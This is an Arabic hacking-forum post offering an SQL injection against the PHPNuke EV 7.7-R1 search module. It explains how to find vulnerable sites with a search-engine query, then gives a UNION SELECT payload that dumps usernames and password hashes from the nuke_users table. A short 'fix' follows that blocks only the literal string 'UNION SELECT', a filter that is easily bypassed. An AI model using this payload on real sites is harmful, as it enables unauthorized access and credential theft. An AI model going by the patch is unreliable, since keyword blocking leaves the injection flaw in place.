منتديات غيوم سيف فلسطين
ثغره PHPNuke EV 7.7 -R1 255349203
منتديات غيوم سيف فلسطين
ثغره PHPNuke EV 7.7 -R1 255349203
منتديات غيوم سيف فلسطين
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


جديد البرامج والهكر واختراق المواقع والمنتديات والأجهزة والإيميل وباك تراك وبرامج انترنت وحماية ومركز الشبكات وانظمة التشغيل والعاب وكاونتر سترايك سورس وافلام اجنبية وعربية وانمى وعروض مصارعة
 
الصفحة الرئيسيةالرئيسيةأحدث الصورالتسجيلدخول

 

 ثغره PHPNuke EV 7.7 -R1

اذهب الى الأسفل 
كاتب الموضوعرسالة





نقاط : 0
تاريخ التسجيل : 01/01/1970

ثغره PHPNuke EV 7.7 -R1 Empty
مُساهمةموضوع: ثغره PHPNuke EV 7.7 -R1   ثغره PHPNuke EV 7.7 -R1 Icon_minitime30/10/2011, 10:52 pm

السلامو عليكم

الشرح



1

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

2 في خانه البحث دخل : PHPNuke EV 7.7 -R1



3 النتائج


4 : تخير الوصلات

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



يعني تحط الموقع وبعديه modules.php?name=Search



وبعدين لو الموقع مصاااب هتلاق بيقول دخل الكلام الي عايز تبحث عنه


فدخل الجمله ديه


كود HTML:



كود PHP:
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*






هيطلعلك كل الهاشات






طريقه قفل الثغره كمان معايا



افتح الملف modules/Search/index.php



وبعد الكود ده



require_once("mainfile.php");



كود:


كود PHP:
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);




ضيف الكمله ديه






كود:




كود PHP:
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}



الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
ثغره PHPNuke EV 7.7 -R1
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» ثغره vBulletin 3.5.2 Html_Injection
» ثغره تمكنك من رفع شيل + هديه شيل .
» ثغره جديده بــ vb3.6 وتقر يبا للكل
» ثغره Invision Power Board 2.0.4 SQL injection
» ثغره جديده في منتديات vBulletin Version 3.5.2

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات غيوم سيف فلسطين :: أختراق المواقع والمنتديات-
انتقل الى: